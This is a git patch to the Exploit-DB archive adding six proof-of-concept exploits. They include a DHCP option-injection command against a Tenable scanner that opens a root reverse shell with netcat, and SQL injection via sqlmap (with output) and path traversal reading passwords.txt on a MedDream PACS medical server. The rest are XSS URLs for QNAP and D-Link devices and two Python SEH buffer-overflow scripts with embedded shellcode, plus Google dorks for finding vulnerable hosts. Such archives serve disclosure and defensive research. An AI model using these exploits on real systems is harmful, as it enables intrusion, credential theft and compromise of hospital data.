From 76af808136a9177e9932fcaaf54fc71522f763a9 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Sat, 8 Sep 2018 05:01:54 +0000
Subject: [PATCH] DB: 2018-09-08

6 changes to exploits/shellcodes

DVD Photo Slideshow Professional 8.07 - Buffer Overflow (SEH)
iSmartViewPro 1.5 - 'SavePath for ScreenShots' Local Buffer Overflow (SEH)

Tenable WAS-Scanner 7.4.1708 - Remote Command Execution

D-Link Dir-600M N150 - Cross-Site Scripting
MedDream PACS Server Premium 6.7.1.1 - 'email' SQL Injection
Softneta MedDream PACS Server Premium 6.7.1.1 - Directory Traversal
QNAP Photo Station 5.7.0 - Cross-Site Scripting
---
 exploits/hardware/webapps/45348.txt | 13 ++++++++
 exploits/linux/remote/45345.txt     | 28 ++++++++++++++++
 exploits/php/webapps/45344.txt      | 44 ++++++++++++++++++++++++
 exploits/php/webapps/45347.txt      | 17 ++++++++++
 exploits/windows/local/45346.py     | 47 ++++++++++++++++++++++++++
 exploits/windows_x86/local/45349.py | 52 +++++++++++++++++++++++++++++
 files_exploits.csv                  |  8 ++++-
 7 files changed, 208 insertions(+), 1 deletion(-)
 create mode 100644 exploits/hardware/webapps/45348.txt
 create mode 100644 exploits/linux/remote/45345.txt
 create mode 100644 exploits/php/webapps/45344.txt
 create mode 100644 exploits/php/webapps/45347.txt
 create mode 100755 exploits/windows/local/45346.py
 create mode 100755 exploits/windows_x86/local/45349.py
diff --git a/exploits/hardware/webapps/45348.txt b/exploits/hardware/webapps/45348.txt
new file mode 100644
index 000000000..805b8a1e0
--- /dev/null
+++ b/exploits/hardware/webapps/45348.txt
@@ -0,0 +1,13 @@
+# Exploit Title: QNAP Photo Station 5.7.0 - Cross-Site Scripting
+# Google Dork: N/A
+# Date: 2018-09-07
+# Exploit Author: Mitsuaki (Mitch) Shiraishi - secureworks
+# Vendor Homepage: https://www.qnap.com/ja-jp/security-advisory/nas-201808-23
+# Software Link: N/A
+# Version: QNAP Photo Station versions 5.7.0 and earlier
+# Tested on: N/A
+# CVE : CVE-2018-0715
+
+# PoC: 
+
+https://***.***.***.***:8080/photo/abc/<img%20src%3Da.jpg%20onerror%3D%22alert(1)%22>.txt
\ No newline at end of file
diff --git a/exploits/linux/remote/45345.txt b/exploits/linux/remote/45345.txt
new file mode 100644
index 000000000..ea1b4d3d4
--- /dev/null
+++ b/exploits/linux/remote/45345.txt
@@ -0,0 +1,28 @@
+# Exploit Title: Tenable WAS-Scanner 7.4.1708 - Remote Command Execution 
+# Discovery by: Sameer Goyal
+# Discovery Date: 2018-05-30
+# Vendor Homepage: https://www.tenable.com/
+# Software Link: https://www.tenable.com/products/tenable-io/web-application-scanning
+# Tested Version: WAS-20180328
+# Vulnerability Type: Remote Command Execution (RCE)
+# Tested on OS: CentOS  7.4.1708
+# Vulnerable daemon version: NetworkManager 1.8.0-11.el7_4
+  
+# Steps to produce the RCE: 
+
+# Step 1:  Setup your malicious DHCP server in the network using dnsmasq:
+
+dnsmasq --interface=eth1 --bind-interfaces  --except-interface=lo --dhcp-range=192.168.51.21,192.168.51.25,1h --conf-file=/dev/null --dhcp-option=6,192.168.51.1 --dhcp-option=3,192.168.51.1 --dhcp-option="252,x'&/home/wizard/nc -nv 192.168.51.1 5555 -e /bin/bash #"
+
+# DHCP-option-3 => gateway IP/ DHCP server IP.
+# DHCP-option-6 => DNS IP, which can be same as gateway IP( not mandatory)
+# DHCP-range => simply subnet range (1h, for 1 hour only)
+# DHCP option=> ì252,xí&<payload> #î
+
+# Start the listener on port 5555 on other terminal .
+# Step 2: Send the normal IP request to the malicious DHCP server from the victim machine.
+
+nmcli con up ìWired Connection 1î && ifconfig
+
+# Step 3: Check the listener, we have got the reverse shell with root privileges.
+# Reference: https://www.exploit-db.com/docs/english/45334-obtaining-command-execution-through-the-networkmanager-daemon.pdf
\ No newline at end of file
diff --git a/exploits/php/webapps/45344.txt b/exploits/php/webapps/45344.txt
new file mode 100644
index 000000000..1cb307990
--- /dev/null
+++ b/exploits/php/webapps/45344.txt
@@ -0,0 +1,44 @@
+# Exploit Title: MedDream PACS Server Premium 6.7.1.1 - 'email' SQL Injection
+# Date: 2018-05-23
+# Software https://www.softneta.com/products/meddream-pacs-server/downloads.html
+# Version: MedDreamPACS Premium 6.7.1.1 
+# Exploit Author: Carlos Avila
+# Google Dork: inurl:Pacs/login.php, inurl:pacsone filetype:php home, inurl:pacsone filetype:php login
+# Category: webapps
+# Tested on: Windows
+# http://twitter.com/badboy_nt
+
+# Proof of Concept
+
+POST /Pacs/userSignup.php HTTP/1.1
+Host: 192.168.6.107
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.6.107/Pacs/userSignup.php?hostname=localhost&database=dicom
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 129
+Cookie: PHPSESSID=4l1c7irpgk1apcqk7ll9d89104
+Connection: close
+Upgrade-Insecure-Requests: 1
+DNT: 1
+
+hostname=localhost&database=dicom&username=hi&password=hi&firstname=jh&lastname=k23klk3l2&email=test@gmail.com&action=Sign+Up
+
+# Parameters affected: email, username
+
+root@deb-17-3:~/meddream# sqlmap -r sqli-signup -f -p email --dbms mysql --dbs 
+
+[10:23:16] [INFO] testing MySQL
+[10:23:16] [INFO] confirming MySQL
+[10:23:16] [INFO] the back-end DBMS is MySQL
+web application technology: Apache, PHP 7.0.30
+back-end DBMS: MySQL >= 5.0.0
+[10:23:16] [INFO] fetching database names
+[10:23:16] [INFO] used SQL query returns 2 entries
+[10:23:16] [INFO] resumed: information_schema
+[10:23:16] [INFO] resumed: dicom
+available databases [2]:
+[*] dicom
+[*] information_schema
\ No newline at end of file
diff --git a/exploits/php/webapps/45347.txt b/exploits/php/webapps/45347.txt
new file mode 100644
index 000000000..37e4f1fd9
--- /dev/null
+++ b/exploits/php/webapps/45347.txt
@@ -0,0 +1,17 @@
+# Exploit Title: Softneta MedDream PACS Server Premium 6.7.1.1 - Directory Traversal
+# Date: 2018-05-23
+# Software Link: https://www.softneta.com/products/meddream-pacs-server/downloads.html
+# Google Dork: inurl:pacs/login.php, inurl:pacsone/login.php, inurl:pacsone filetype:php home, inurl:pacsone filetype:php login
+# Version: MedDream PACS Server Premium 6.7.1.1
+# Category: webapps
+# Tested on: Windows 7 
+# Exploit Author: Carlos Avila
+# Contact: http://twitter.com/badboy_nt
+  
+# Proof of Concept
+
+http://TARGET/pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini
+
+http://TARGET/Pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows\System32\drivers\etc\hosts
+
+http://TARGET/Pacs/nocache.php?path=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c\MedDreamPACS-Premium\passwords.txt (Attack Vector, obtain private information from users and passwords -Bypass Authentication- )
\ No newline at end of file
diff --git a/exploits/windows/local/45346.py b/exploits/windows/local/45346.py
new file mode 100755
index 000000000..c4873b78f
--- /dev/null
+++ b/exploits/windows/local/45346.py
@@ -0,0 +1,47 @@
+# Exploit Title: DVD Photo Slideshow Professional  8.07 - Buffer Overflow (SEH)
+# Date: 2018-09-06
+# Exploit Author:T3jv1l
+# Vendor Homepage:http://www.dvd-photo-slideshow.com/
+# Software:www.dvd-photo-slideshow.com/dps_install.exe
+# Category:Local
+# Contact:https://twitter.com/T3jv1l
+# Version: DVD Photo Slideshow Professional  8.07
+# Tested on: Windows 7 SP1 x86
+# Method Corelan Coder : https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/
+
+#!/bin/python
+
+print"""
+#1.  Download and install the setup file
+#2.  Run this exploit code via python 2.7
+#3.  A file "Evil.txt" will be created
+#4.  Click Help > Register... in tool bar
+#5.  Copy the contents of the file (Evil.txt)and paste in the Registration Name field 
+#6.  Click Activate and BOOMMMM !!!! """
+
+import struct
+
+junk_byte = "A" * 256
+nseh = "\x90\x90\xeb\x10"
+seh = struct.pack("<L",0x100152c9) # 0x100152c9 : pop edi # pop esi # ret
+nop = "\x90" *24
+
+#Windows - MessageBox + Null-Free Shellcode (113 bytes) : BrokenByte
+ 
+buf = ("\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"
+"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"
+"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"
+"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e"
+"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c"
+"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74"
+"\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe"
+"\x49\x0b\x31\xc0\x51\x50\xff\xd7")
+
+crash = "T" * (4000 -len(junk_byte+nseh+seh+nop+buf))
+exploit = junk_byte + nseh + seh + nop + buf + crash
+try: 
+    f=open("Evil.txt","w")
+    f.write(exploit)
+    f.close()
+except:
+   print "[+] File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows_x86/local/45349.py b/exploits/windows_x86/local/45349.py
new file mode 100755
index 000000000..b19003787
--- /dev/null
+++ b/exploits/windows_x86/local/45349.py
@@ -0,0 +1,52 @@
+# Exploit Title: iSmartViewPro 1.5 - 'SavePath for ScreenShots' Buffer Overflow (SEH)
+# Author: Gionathan "John" Reale
+# Discovey Date: 2018-09-07
+# Software Link: https://securimport.com/university/videovigilancia-ip/software/493-software-ismartviewpro-v1-5
+# Tested Version: 1.5
+# Tested on OS: Windows 7 32bit
+# Steps to Reproduce: 
+# Run the python exploit script, it will create a new file with the name 
+# "exploit.txt" just copy the text inside "exploit.txt" and start the 
+# iSmartViewPro 1.5 program and click on "System Setup" in the 
+# "Save Path for Snapshot and Record file" field. Paste the content of 
+# "exploit.txt" and click on Save. You will see a calculator poped up.
+
+#!/usr/bin/python
+   
+buffer = "A" * 260
+
+NSEH = "\xeb\x06\x90\x90"
+
+SEH = "\xdf\x16\x01\x10"
+nops = "\x90" * 4000
+#badchar \x00\x0a\x0d\x2f
+#msfvenom calculator
+buf =  ""
+buf += "\xba\x9a\x98\xaf\x7e\xdd\xc2\xd9\x74\x24\xf4\x5f\x29"
+buf += "\xc9\xb1\x31\x83\xc7\x04\x31\x57\x0f\x03\x57\x95\x7a"
+buf += "\x5a\x82\x41\xf8\xa5\x7b\x91\x9d\x2c\x9e\xa0\x9d\x4b"
+buf += "\xea\x92\x2d\x1f\xbe\x1e\xc5\x4d\x2b\x95\xab\x59\x5c"
+buf += "\x1e\x01\xbc\x53\x9f\x3a\xfc\xf2\x23\x41\xd1\xd4\x1a"
+buf += "\x8a\x24\x14\x5b\xf7\xc5\x44\x34\x73\x7b\x79\x31\xc9"
+buf += "\x40\xf2\x09\xdf\xc0\xe7\xd9\xde\xe1\xb9\x52\xb9\x21"
+buf += "\x3b\xb7\xb1\x6b\x23\xd4\xfc\x22\xd8\x2e\x8a\xb4\x08"
+buf += "\x7f\x73\x1a\x75\xb0\x86\x62\xb1\x76\x79\x11\xcb\x85"
+buf += "\x04\x22\x08\xf4\xd2\xa7\x8b\x5e\x90\x10\x70\x5f\x75"
+buf += "\xc6\xf3\x53\x32\x8c\x5c\x77\xc5\x41\xd7\x83\x4e\x64"
+buf += "\x38\x02\x14\x43\x9c\x4f\xce\xea\x85\x35\xa1\x13\xd5"
+buf += "\x96\x1e\xb6\x9d\x3a\x4a\xcb\xff\x50\x8d\x59\x7a\x16"
+buf += "\x8d\x61\x85\x06\xe6\x50\x0e\xc9\x71\x6d\xc5\xae\x8e"
+buf += "\x27\x44\x86\x06\xee\x1c\x9b\x4a\x11\xcb\xdf\x72\x92"
+buf += "\xfe\x9f\x80\x8a\x8a\x9a\xcd\x0c\x66\xd6\x5e\xf9\x88"
+buf += "\x45\x5e\x28\xeb\x08\xcc\xb0\xc2\xaf\x74\x52\x1b"
+pad = "B" * (6384 - len(NSEH) - len(SEH) - len(buffer) - len(nops) - len(buf) )
+
+payload = buffer + NSEH + SEH + nops + buf + pad
+try:
+    f=open("exploit.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 7b6c38ccf..ebad44ba7 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -9937,6 +9937,8 @@ id,file,description,date,author,type,platform,port
 45312,exploits/windows_x86/local/45312.c,"Argus Surveillance DVR 4.0.0.0 - Privilege Escalation",2018-08-31,hyp3rlinx,local,windows_x86,
 45313,exploits/linux/local/45313.rb,"Network Manager VPNC - Username Privilege Escalation (Metasploit)",2018-08-31,Metasploit,local,linux,
 45325,exploits/windows_x86/local/45325.py,"iSmartViewPro 1.5 - 'DDNS' Buffer Overflow",2018-09-04,"Luis Martínez",local,windows_x86,
+45346,exploits/windows/local/45346.py,"DVD Photo Slideshow Professional 8.07 - Buffer Overflow (SEH)",2018-09-07,T3jv1l,local,windows,
+45349,exploits/windows_x86/local/45349.py,"iSmartViewPro 1.5 - 'SavePath for ScreenShots' Local Buffer Overflow (SEH)",2018-09-07,"Gionathan Reale",local,windows_x86,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -16764,6 +16766,7 @@ id,file,description,date,author,type,platform,port
 45273,exploits/unix/remote/45273.rb,"HP Jetdirect - Path Traversal Arbitrary Code Execution (Metasploit)",2018-08-27,Metasploit,remote,unix,
 45333,exploits/windows_x86/remote/45333.py,"FTPShell Server 6.80 - 'Add Account Name' Buffer Overflow (SEH)",2018-09-05,"Luis Martínez",remote,windows_x86,
 45283,exploits/hardware/remote/45283.rb,"Eaton Xpert Meter 13.4.0.10 - SSH Private Key Disclosure",2018-08-29,BrianWGray,remote,hardware,
+45345,exploits/linux/remote/45345.txt,"Tenable WAS-Scanner 7.4.1708 - Remote Command Execution",2018-09-07,"Sameer Goyal",remote,linux,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39921,8 +39924,11 @@ id,file,description,date,author,type,platform,port
 45319,exploits/windows/webapps/45319.txt,"FsPro Labs Event Log Explorer v4.6.1.2115 - XML External Entity Injection",2018-09-03,hyp3rlinx,webapps,windows,
 45322,exploits/php/webapps/45322.txt,"Admidio 3.3.5 - Cross-Site Request Forgery (Change Permissions)",2018-09-03,"Nawaf Alkeraithe",webapps,php,80
 45323,exploits/php/webapps/45323.txt,"Online Quiz Maker 1.0 - 'catid' SQL Injection",2018-09-03,AkkuS,webapps,php,80
-45343,exploits/hardware/webapps/45343.txt,"D-Link Dir-600M N150 - Cross-Site Scripting",2018-09-06,"PUNIT DARJI",webapps,hardware,
+45343,exploits/hardware/webapps/45343.txt,"D-Link Dir-600M N150 - Cross-Site Scripting",2018-09-06,"PUNIT DARJI",webapps,hardware,80
 45326,exploits/php/webapps/45326.txt,"Logicspice FAQ Script 2.9.7 - Remote Code Execution",2018-09-04,AkkuS,webapps,php,80
 45327,exploits/php/webapps/45327.txt,"PHP File Browser Script 1 - Directory Traversal",2018-09-04,AkkuS,webapps,php,443
 45328,exploits/php/webapps/45328.txt,"Simple POS 4.0.24 - 'columns[0][search][value]' SQL Injection",2018-09-04,"Renos Nikolaou",webapps,php,
 45330,exploits/php/webapps/45330.txt,"mooSocial Store Plugin 2.6 - SQL Injection",2018-09-04,"Andrea Bocchetti",webapps,php,
+45344,exploits/php/webapps/45344.txt,"MedDream PACS Server Premium 6.7.1.1 - 'email' SQL Injection",2018-09-07,"Carlos Avila",webapps,php,80
+45347,exploits/php/webapps/45347.txt,"Softneta MedDream PACS Server Premium 6.7.1.1 - Directory Traversal",2018-09-07,"Carlos Avila",webapps,php,
+45348,exploits/hardware/webapps/45348.txt,"QNAP Photo Station 5.7.0 - Cross-Site Scripting",2018-09-07,"Mitsuaki Shiraishi",webapps,hardware,
